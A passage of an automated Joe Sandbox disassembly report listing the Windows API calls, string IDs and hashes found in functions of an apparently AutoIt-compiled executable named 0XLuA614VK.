                                                      • GetMenuItemCount.USER32(00FF1990), ref: 00F62F8D
                                                      • GetMenuItemCount.USER32(00FF1990), ref: 00F6303D
                                                      • GetCursorPos.USER32(?), ref: 00F63081
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F6308A
                                                      • TrackPopupMenuEx.USER32(00FF1990,00000000,?,00000000,00000000,00000000), ref: 00F6309D
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F630A9
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 36266755-4108050209
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00FB6DEB
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FB6E5F
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FB6E81
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FB6E94
                                                      • DestroyWindow.USER32(?), ref: 00FB6EB5
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F20000,00000000), ref: 00FB6EE4
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FB6EFD
                                                      • GetDesktopWindow.USER32 ref: 00FB6F16
                                                      • GetWindowRect.USER32(00000000), ref: 00FB6F1D
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FB6F35
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FB6F4D
                                                        • Part of subcall function 00F39944: GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 2429346358-3619404913
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00FB9147
                                                        • Part of subcall function 00FB7674: ClientToScreen.USER32(?,?), ref: 00FB769A
                                                        • Part of subcall function 00FB7674: GetWindowRect.USER32(?,?), ref: 00FB7710
                                                        • Part of subcall function 00FB7674: PtInRect.USER32(?,?,00FB8B89), ref: 00FB7720
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FB91B0
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FB91BB
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FB91DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FB9225
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FB923E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FB9255
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FB9277
                                                      • DragFinish.SHELL32(?), ref: 00FB927E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FB9371
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 221274066-3440237614
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F9C4B0
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F9C4C3
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F9C4D7
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F9C4F0
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F9C533
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F9C549
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F9C554
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F9C584
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F9C5DC
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F9C5F0
                                                      • InternetCloseHandle.WININET(00000000), ref: 00F9C5FB
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      • API String ID: 3800310941-3916222277
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00FB8592
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85A2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85AD
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85BA
                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85C8
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85D7
                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85E0
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85E7
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00FB85F8
                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00FBFC38,?), ref: 00FB8611
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FB8621
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00FB8641
                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00FB8671
                                                      • DeleteObject.GDI32(?), ref: 00FB8699
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FB86AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 00F91502
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00F9150B
                                                      • VariantClear.OLEAUT32(?), ref: 00F91517
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F915FB
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00F91657
                                                      • VariantInit.OLEAUT32(?), ref: 00F91708
                                                      • SysFreeString.OLEAUT32(?), ref: 00F9178C
                                                      • VariantClear.OLEAUT32(?), ref: 00F917D8
                                                      • VariantClear.OLEAUT32(?), ref: 00F917E7
                                                      • VariantInit.OLEAUT32(00000000), ref: 00F91823
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 1234038744-3931177956
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00FAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FAB6AE,?,?), ref: 00FAC9B5
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FAC9F1
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA68
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FAB6F4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FAB772
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00FAB80A
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FAB87E
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FAB89C
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00FAB8F2
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FAB904
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FAB922
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FAB983
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FAB994
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00FA25D8
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FA25E8
                                                      • CreateCompatibleDC.GDI32(?), ref: 00FA25F4
                                                      • SelectObject.GDI32(00000000,?), ref: 00FA2601
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00FA266D
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00FA26AC
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00FA26D0
                                                      • SelectObject.GDI32(?,?), ref: 00FA26D8
                                                      • DeleteObject.GDI32(?), ref: 00FA26E1
                                                      • DeleteDC.GDI32(?), ref: 00FA26E8
                                                      • ReleaseDC.USER32(00000000,?), ref: 00FA26F3
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00F5DAA1
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D659
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D66B
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D67D
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D68F
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6A1
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6B3
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6C5
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6D7
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6E9
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D6FB
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D70D
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D71F
                                                        • Part of subcall function 00F5D63C: _free.LIBCMT ref: 00F5D731
                                                      • _free.LIBCMT ref: 00F5DA96
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5DAB8
                                                      • _free.LIBCMT ref: 00F5DACD
                                                      • _free.LIBCMT ref: 00F5DAD8
                                                      • _free.LIBCMT ref: 00F5DAFA
                                                      • _free.LIBCMT ref: 00F5DB0D
                                                      • _free.LIBCMT ref: 00F5DB1B
                                                      • _free.LIBCMT ref: 00F5DB26
                                                      • _free.LIBCMT ref: 00F5DB5E
                                                      • _free.LIBCMT ref: 00F5DB65
                                                      • _free.LIBCMT ref: 00F5DB82
                                                      • _free.LIBCMT ref: 00F5DB9A
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00F8369C
                                                      • _wcslen.LIBCMT ref: 00F836A7
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F83797
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00F8380C
                                                      • GetDlgCtrlID.USER32(?), ref: 00F8385D
                                                      • GetWindowRect.USER32(?,?), ref: 00F83882
                                                      • GetParent.USER32(?), ref: 00F838A0
                                                      • ScreenToClient.USER32(00000000), ref: 00F838A7
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00F83921
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00F8395D
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 4010501982-679674701
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00F84994
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00F849DA
                                                      • _wcslen.LIBCMT ref: 00F849EB
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00F849F7
                                                      • _wcsstr.LIBVCRUNTIME ref: 00F84A2C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00F84A64
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00F84A9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00F84AE6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00F84B20
                                                      • GetWindowRect.USER32(?,?), ref: 00F84B8B
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FB8D5A
                                                      • GetFocus.USER32 ref: 00FB8D6A
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00FB8D75
                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00FB8E1D
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FB8ECF
                                                      • GetMenuItemCount.USER32(?), ref: 00FB8EEC
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FB8EFC
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FB8F2E
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FB8F70
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FB8FA1
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                      • String ID: 0
                                                      • API String ID: 1026556194-4108050209
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FACC64
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00FACC8D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FACD48
                                                        • Part of subcall function 00FACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00FACCAA
                                                        • Part of subcall function 00FACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00FACCBD
                                                        • Part of subcall function 00FACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FACCCF
                                                        • Part of subcall function 00FACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FACD05
                                                        • Part of subcall function 00FACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FACD28
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FACCF3
                                                      Similarity
                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2734957052-4033151799
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00F8E6B4
                                                        • Part of subcall function 00F3E551: timeGetTime.WINMM(?,?,00F8E6D4), ref: 00F3E555
                                                      • Sleep.KERNEL32(0000000A), ref: 00F8E6E1
                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F8E705
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F8E727
                                                      • SetActiveWindow.USER32 ref: 00F8E746
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F8E754
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F8E773
                                                      • Sleep.KERNEL32(000000FA), ref: 00F8E77E
                                                      • IsWindow.USER32 ref: 00F8E78A
                                                      • EndDialog.USER32(00000000), ref: 00F8E79B
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: cb48c18e25285675b47dd45213e4df599fc26db77d5b3587f65564511eb74a61
                                                      • Instruction ID: 8057e7578c4878f1a34ff3686e3b1f178a491c479aac76e5ea0b4356b4cd103d
                                                      • Opcode Fuzzy Hash: cb48c18e25285675b47dd45213e4df599fc26db77d5b3587f65564511eb74a61
                                                      • Instruction Fuzzy Hash: 80215BB420020CAFEB106F20ECCAE7A3B6EBB54B58B140525F515C21B1DBB5AC00FF64
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F8EA5D
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F8EA73
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F8EA84
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F8EA96
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F8EAA7
                                                      Strings
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 98242d5dedb8af22ddbec2681fdf26481fffdbdc671fd98d1e1c7d0f6ffcd8dd
                                                      • Instruction ID: fbe6449210141b4ffb8b8993174bde00b49a116231d81f2ed0caac7853b91a25
                                                      • Opcode Fuzzy Hash: 98242d5dedb8af22ddbec2681fdf26481fffdbdc671fd98d1e1c7d0f6ffcd8dd
                                                      • Instruction Fuzzy Hash: A3118231A5026D79D724E762DC4ADFF7A7CEBD1F50F000425B401E20D1DAB45A45E6B1
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00F85CE2
                                                      • GetWindowRect.USER32(00000000,?), ref: 00F85CFB
                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F85D59
                                                      • GetDlgItem.USER32(?,00000002), ref: 00F85D69
                                                      • GetWindowRect.USER32(00000000,?), ref: 00F85D7B
                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F85DCF
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00F85DDD
                                                      • GetWindowRect.USER32(00000000,?), ref: 00F85DEF
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F85E31
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00F85E44
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F85E5A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00F85E67
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: df3f9cacaf7b729c99d35841e626211d6d3100fc938209270263e41abf772025
                                                      • Instruction ID: 9f2ee135cbff54065629311d28312bf5a5956925182d7f46ff6b6bb9f9e94523
                                                      • Opcode Fuzzy Hash: df3f9cacaf7b729c99d35841e626211d6d3100fc938209270263e41abf772025
                                                      • Instruction Fuzzy Hash: B3510F71E00609AFDF18DF68DD89AAE7BB5AB48710F148229F915E7290D7709D04DB50
                                                      APIs
                                                        • Part of subcall function 00F38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F38BE8,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F38FC5
                                                      • DestroyWindow.USER32(?), ref: 00F38C81
                                                      • KillTimer.USER32(00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F38D1B
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00F76973
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F769A1
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F769B8
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F38BBA,00000000), ref: 00F769D4
                                                      • DeleteObject.GDI32(00000000), ref: 00F769E6
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: cfc86abdb6f1db4041c6472c5a9c6b017f0787a72e6775e71ed94e3a21241f37
                                                      • Instruction ID: 18f27b1a7065ffab4f53fe66c79264d717e2f3ba409ef5c8d844f6a2bd8115f6
                                                      • Opcode Fuzzy Hash: cfc86abdb6f1db4041c6472c5a9c6b017f0787a72e6775e71ed94e3a21241f37
                                                      • Instruction Fuzzy Hash: AA61AB31902B08DFDB359F24CA48B2677B1FF403B2F149519E04697560CB79A882FFA1
                                                      APIs
                                                        • Part of subcall function 00F39944: GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      • GetSysColor.USER32(0000000F), ref: 00F39862
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: c29b0c7062656c041d77f60d690bfbb313b8ed6d6cc976abdda92410146ede4c
                                                      • Instruction ID: 1e3501592cb0695f64c0f6f7f0bd30f2a9439fa1f1dd7ecfbf9666e5573277b1
                                                      • Opcode Fuzzy Hash: c29b0c7062656c041d77f60d690bfbb313b8ed6d6cc976abdda92410146ede4c
                                                      • Instruction Fuzzy Hash: E841C131508644AFDB209F3C9C84BBA3BA5AB46330F584605F9A6972E1C7F19C41FF61
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F89717
                                                      • LoadStringW.USER32(00000000,?,00F6F7F8,00000001), ref: 00F89720
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F89742
                                                      • LoadStringW.USER32(00000000,?,00F6F7F8,00000001), ref: 00F89745
                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F89866
                                                      Strings
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: 0a42ed5e1fab84b693b619c573b69a9cfa162a6cc606e628aa87dd55ef1434ff
                                                      • Instruction ID: 6d40f284321dd0aa53cf68c2b388243228760e5044ed88313dfff7dd7270235b
                                                      • Opcode Fuzzy Hash: 0a42ed5e1fab84b693b619c573b69a9cfa162a6cc606e628aa87dd55ef1434ff
                                                      • Instruction Fuzzy Hash: D241307280422DAACF04FBE0ED96DEE7778AF54340F540425F505B2092EB796F48EB61
                                                      APIs
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F807A2
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F807BE
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F807DA
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F80804
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F8082C
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F80837
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F8083C
                                                      Strings
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: dd5a8c9301f956e08588b567a59563d4c2d4b4c21129e13f83ea7a7c3dde7732
                                                      • Instruction ID: 13acff9438c10faa60e6d5321a94643550bc92460027e3ea3fc7e093f11fb888
                                                      • Opcode Fuzzy Hash: dd5a8c9301f956e08588b567a59563d4c2d4b4c21129e13f83ea7a7c3dde7732
                                                      • Instruction Fuzzy Hash: B5410672C1022DABDF15EBA4EC958EEB778BF04750F444129F901A7161EB749E48EFA0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FA3C5C
                                                      • CoInitialize.OLE32(00000000), ref: 00FA3C8A
                                                      • CoUninitialize.OLE32 ref: 00FA3C94
                                                      • _wcslen.LIBCMT ref: 00FA3D2D
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00FA3DB1
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FA3ED5
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00FA3F0E
                                                      • CoGetObject.OLE32(?,00000000,00FBFB98,?), ref: 00FA3F2D
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00FA3F40
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FA3FC4
                                                      • VariantClear.OLEAUT32(?), ref: 00FA3FD8
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: 79a1e147e3d099fa0f71a5c10ff50d87db63836789857cabf2915e61cf1d885d
                                                      • Instruction ID: 7195ef24c0b76b159529423db29c9e34c1cbef453b525c7129b9a23b3bf0d6ce
                                                      • Opcode Fuzzy Hash: 79a1e147e3d099fa0f71a5c10ff50d87db63836789857cabf2915e61cf1d885d
                                                      • Instruction Fuzzy Hash: F0C146B1A083059FD700DF68C88492BB7E9FF8A754F14491DF98A9B251DB30EE05DB92
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00F97AF3
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F97B8F
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00F97BA3
                                                      • CoCreateInstance.OLE32(00FBFD08,00000000,00000001,00FE6E6C,?), ref: 00F97BEF
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F97C74
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00F97CCC
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00F97D57
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F97D7A
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00F97D81
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00F97DD6
                                                      • CoUninitialize.OLE32 ref: 00F97DDC
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: 9e9600778a81ecad5c4831bcbb3dfed7af8b27f17c848bdb80bee1a093b8b4bd
                                                      • Instruction ID: b1a99fd262532169545f5cd2799824ae3d66d6baeaa23a4ea1475d1a6514e66b
                                                      • Opcode Fuzzy Hash: 9e9600778a81ecad5c4831bcbb3dfed7af8b27f17c848bdb80bee1a093b8b4bd
                                                      • Instruction Fuzzy Hash: 73C14975A04219AFDB14DFA4C884DAEBBF9FF48314B148199E81ADB261C730EE41DF90
                                                      APIs
